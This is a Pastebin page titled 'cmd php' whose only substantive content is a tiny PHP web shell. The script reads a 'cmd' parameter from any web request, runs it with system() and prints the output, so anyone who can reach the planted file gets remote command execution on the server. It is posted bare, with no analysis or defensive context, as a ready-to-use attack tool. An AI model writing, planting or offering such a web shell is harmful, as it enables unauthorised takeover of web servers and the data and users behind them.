Pastebin
API
tools
faq
paste
Login
Sign up
SHARE
TWEET
cmd php
CreadPag
Jan 14th, 2019
168
0
Never
Add comment
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!
PHP
0.16 KB
| None
|
0
0
raw
download
clone
embed
print
report
<?php
if
(
isset
(
$_REQUEST
[
'cmd'
]
)
)
{
echo
"<pre>"
;
$cmd
=
(
$_REQUEST
[
'cmd'
]
)
;
system
(
$cmd
)
;
echo
"</pre>"
;
die
;
}
?>
Add Comment
Please,
Sign In
to add comment
Public Pastes
Minecraft Dialog 1.21.6+ fix
JSON | 1 hour ago | 0.66 KB
Untitled
C | 2 hours ago | 4.55 KB
2025-07-15_stats.json
JSON | 2 hours ago | 2.43 KB
2025-07-15_stats.json
JSON | 2 hours ago | 2.42 KB
2025-07-15_stats.json
JSON | 2 hours ago | 2.42 KB
Sensor Controller rev_16
Arduino | 3 hours ago | 4.04 KB
Encoder Display rev_08
Arduino | 3 hours ago | 2.43 KB
Encoder Display rev_07
Arduino | 3 hours ago | 3.03 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!